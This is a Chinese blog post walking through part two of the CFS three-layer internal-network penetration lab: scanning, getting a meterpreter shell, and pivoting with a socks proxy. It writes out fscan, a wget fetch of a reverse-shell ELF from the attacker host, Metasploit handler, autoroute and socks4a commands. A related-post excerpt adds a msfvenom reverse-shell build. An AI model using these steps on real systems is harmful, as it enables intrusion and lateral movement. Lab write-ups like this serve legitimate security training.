CFS三层内网渗透——进入二层内网并socks转发流量(二)

已于 2024-07-25 21:13:54 修改
阅读量891 收藏 7
点赞数 23
文章标签: 网络 windows 安全 linux 网络安全 服务器
于 2024-07-05 14:04:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74171325/article/details/140191062
版权

目录

信息收集阶段

fscan收集

对这个网段进行信息扫描

收集成功

上线阶段

​成功上传病毒文件

 给病毒文件添加可执行权限

进入msfconsole开启监听

​运行后门elf等上线

​成功上线我们攻击机

流量转发代理阶段

SOCKS端口代理,主要是转发出来代理的流量

配置参数,socks版本4a比较稳定 

​run成功开启代理监听

路由配置连接sessions,记住在sessions里面进行路由配置转发出来

 配置socks的代理到浏览器

​不开启代理不能访问

开启后成功访问 

生成一个elf病毒,然后通过蚁剑进行wget远程传输,前面文章有提到各种文件传输方式

Linux文件传输-CSDN博客文章浏览阅读271次。由于curl是访问,不带命令参数的话就是简单的访问远程目标文件,不会进行下载。这里我拿kali来演示,先创建个要传输的文件,然后python开启监听。https://blog.csdn.net/weixin_74171325/article/details/140079615?utm_source=miniapp_weixin

信息收集阶段

fscan收集

对这个网段进行信息扫描

chmod u+x fscan   #给个权限
./fscan -h 192.168.22.0/24  开始收集

收集成功

上线阶段

wget http://192.168.20.128:8000/10000_reverse.elf

成功上传病毒文件

 给病毒文件添加可执行权限

chmod u+x 10000_reverse.elf

进入msfconsole开启监听

handler -p linux/x64/meterpreter_reverse_tcp -H 192.168.20.128 -P 10000

运行后门elf等上线

 成功上线我们攻击机

流量转发代理阶段

SOCKS端口代理,主要是转发出来代理的流量

search socks

配置参数,socks版本4a比较稳定 

set srvport 20000   #修改端口
set version 4a      #修改版本

run成功开启代理监听

路由配置连接sessions,记住在sessions里面进行路由配置转发出来

sessions  
sessions 1               #进入上线主机
run autoroute -s 192.168.22.0/24   #搞个路由转发,连通我们的公网
run autoroute -p  #可以看到我们的sessions 1已经成功链接这个网段

 配置socks的代理到浏览器

 不开启代理不能访问

开启后成功访问 

peiqi_crazy
关注
  • 23
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
二三层转发原理
上道的程序员
01-14 1035
二层即数据链路层的转发是以数据帧的格式进行转发,数据帧的格式如下:目的地址(Destination Address,DA) :可以是单独的地址,或者是广播或组播MAC地址。源地址(Source Address,SA) :用来识别发送没备,在SA字段中,广播和组播地址格式是非法的。类型(Type) :用类型字段来识别络层的协议。数据(Data) :这是从络层传送到数据链路层的数据包。它的大小可以在46~1500字节之间变化。
二层数据帧转发过程
热门推荐
jiang1818608的博客
10-25 1万+
二层数据帧转发过程
交换机的二层转发和三层转发
NeverGUM的博客
12-02 9447
二层交换原理 二层交换设备工作在OSI模型的第二层,即数据链路层,它对数据包的转发是建立在MAC(Media Access Control )地址基础之上的。二层交换设备不同的接口发送和接收数据独立,各接口属于不同的冲突域,因此有效地隔离了络中物理层冲突域,使得 通过它互连的主机(或络)之间不必再担心流量大小对于数据发送冲突的影响。二层交换设备通过解析和学习以太帧的源MAC来维护MAC地址...
二层交换机转发原理
wangyayayaya的专栏
11-15 2255
Acces Trunk Hybird
基于vlan的二层、三层转发原理
不能让自己太安逸,努力奋斗才是真
07-30 5730
开门见山,含有vlan的二层转发原理文字描述和流程图如下: 基于Vlan的二层转发流程主要包括:确定和查找Vlan、查找和学习源MAC、查找目的MAC并转发数据帧。 1) 确定和查找Vlan:交换机端口接收到一个数据帧时,首先通过TPID值判断该帧是否带标签[1]。 若是tagged帧,且Vid≠0,则在端口所属的Vlan表中查找该帧标签中的Vid是否存在,若存在,则进入下一步,否则丢弃该帧(或提交CPU处理...
二三层转发原理及过程_容器络 calico 基本原理和模拟
weixin_39640520的博客
12-10 761
摘要在容器络跨 Host 互联方案中,除了 Flannel 的隧道实现方案,还有一种比较主流的纯三层路由的方案 Calico ,与 Flannel 不同的是 Calico 不使用隧道或 NAT 来实现转发,而是巧妙的把所有二三层流量转换成三层流量,并通过 host 上路由配置完成跨 Host 转发,本文对 Calico 的方案进行基本原理分析和模拟验证。简介Calico 官方定义如下:Calic...
第70天:内安全-域横向内漫游Socks代理隧道技术1
08-03
3. **CFS三层内漫游安全测试**:这是一个在CTF比赛中的场景,涉及多层内和Web攻防。我们首先生成Linux后门,然后通过Metasploit框架接收反弹shell。利用获取的权限,收集络信息,添加路由,开启Socks4a代理。...
核心飞行系统(cFS)操作系统抽象层(OSAL).zip
03-29
核心飞行系统(cFS)是美国...总的来说,OSAL是cFS的核心组件之一,它为航空航天等领域的嵌入式软件开发提供了一种强大的抽象层,使得软件能够在多种操作系统环境下运行,降低了软件开发的复杂度,提高了系统的可靠性。
CFS.zip_CFS-GA_cfs
09-21
**二、CFS-GA实现** CFS-GA是CFS的一种优化版本,它引入了遗传算法(Genetic Algorithm, GA)来优化筛选规则。遗传算法是一种模拟自然选择和遗传过程的搜索算法,能够在全球范围内找到近似最优解。 1. **种群初始...
osal:核心飞行系统(cFS)操作系统抽象层(OSAL)
03-11
核心飞行系统:框架:操作系统抽象层 该存储库包含NASA的操作系统抽象层(OSAL),它是核心飞行系统的框架组件。 这是位于cFS任务树的osal子目录中的abstractio API和相关框架的集合。 核心飞行系统捆绑在,其中...
论文研究-基于GA-CFS和AdaBoost算法的流量分类.pdf
07-22
鉴于特征属性选择在流量分类中占据重要地位, 为了确定最优特征子集, 利用CFS作为适应度函数的改进遗传算法GA-CFS, 从流量的249个属性空间中提取主要属性并最终选定18个特征组合作为最优特征子集。...
华为二层直接转发简单配置流程总结
qq_47529104的博客
12-18 1676
AP上线 首先是AP上线,一般来说AP通过DHCP获取到自己的IP地址,然后就会通过广播希望与AC建立连接。所以我们需要在络上设置一个DHCP服务器为AP分配IP地址。 一般来说我们会分为管理VLAN和业务VLAN,而AP的上联一般又是交换机,那么上联的交换机的接口类型该选择什么呢?一般选择trunk,因为一个AP上可能承载着不同的vlan数据,那么我们的数据就需要一根可以承载多个vlan的链路,所以这边我们就需要设置上联交换机的端口为trunk口。同时我们要设置上联trunk口的pvid为管...
含有vlan的二层、三层转发原理
Tasdily的博客
03-11 7059
开门见山,含有vlan的二层转发原理文字描述和流程图如下: 基于Vlan的二层转发流程主要包括:确定和查找Vlan、查找和学习源MAC、查找目的MAC并转发数据帧。 1) 确定和查找Vlan:交换机端口接收到一个数据帧时,首先通过TPID值判断该帧是否带标签[1]。 若是tagged帧,且Vid≠0,则在端口所属的Vlan表中查找该帧标签中的Vid是否存在,若存在,则进入下一步,否则丢弃该帧...
二层转发实例讲解
qq_34342887的博客
04-10 2811
图1、二层转发连接图 一、二层转发的描述(PC2 ping PC3、只通过了交换机) 1、PC2生成一个源IP地址为192.168.1.2/24,目的IP地址为192.168.1.3/24的ICMP请求报文。 (注:/24指的是Netma...
Linux络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 282
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
S5730举例
最新发布
jjjxxxhhh123的博客
07-27 643
例子: 假设在校园络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在络中无限制地传输,形成络风暴,导致整个络瘫痪。PIM-SM通过仅在需要时在络中传输组播数据包,减少络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些络技术和配置在大学校园络中起到关键作用,确保络运行高效、安全和可靠,同时满足用户的多样化需求。
络编程套接字socket
安权_code的博客
07-23 962
络编程中的套接字(socket)是实现络通信的关键,换句话来说,套接字像两个端点,而发送方与接收方就是通过这两个端点进行通信的,socket的意思是插座,表示插头和插座连接上后,即发送方和接收方连接上了,然后把电流通过插座流向插头对标发送方与接收方建立了链接。
使用WebSocket协议调用群发方法将消息返回客户端页面
2302_79840586的博客
07-27 850
使用WebSocket协议调用群发方法将消息返回客户端页面
cfs渗透centos7靶机下载
12-05
为了在CentOS 7靶机上进行内渗透,我们可以通过开放80端口并访问站的方式进行下载。具体步骤如下: 1. 在Kali Linux上打开代理,以便访问CentOS 7靶机的站。 2. 打开浏览器,输入CentOS 7靶机的IP地址和80端口号,访问站。 3. 在站上查找需要下载的文件,并下载到本地。 另外,我们还可以使用msfvenom生成一个meterpreter反向Shell,然后将其上传到CentOS 7靶机上进行下载。具体步骤如下: 1. 在Kali Linux上使用msfvenom生成一个meterpreter反向Shell,命令如下: ```shell msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> SessionCommunicationTimeout=0 SessionExpiration=0 -f elf > muma.elf ``` 其中,`<attacker IP>`和`<attacker port>`分别为攻击者的IP地址和端口号,`muma.elf`为生成的反向Shell文件名。 2. 将生成的反向Shell文件上传到CentOS 7靶机上,可以使用scp命令,命令如下: ```shell scp muma.elf <username>@<target IP>:<path> ``` 其中,`<username>`为CentOS 7靶机上的用户名,`<target IP>`为CentOS 7靶机的IP地址,`<path>`为上传文件的路径。 3. 在CentOS 7靶机上运行反向Shell文件,命令如下: ```shell ./muma.elf ``` 运行后,反向Shell会连接到攻击者的机器,攻击者可以通过反向Shell进行下载等操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

peiqi_crazy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值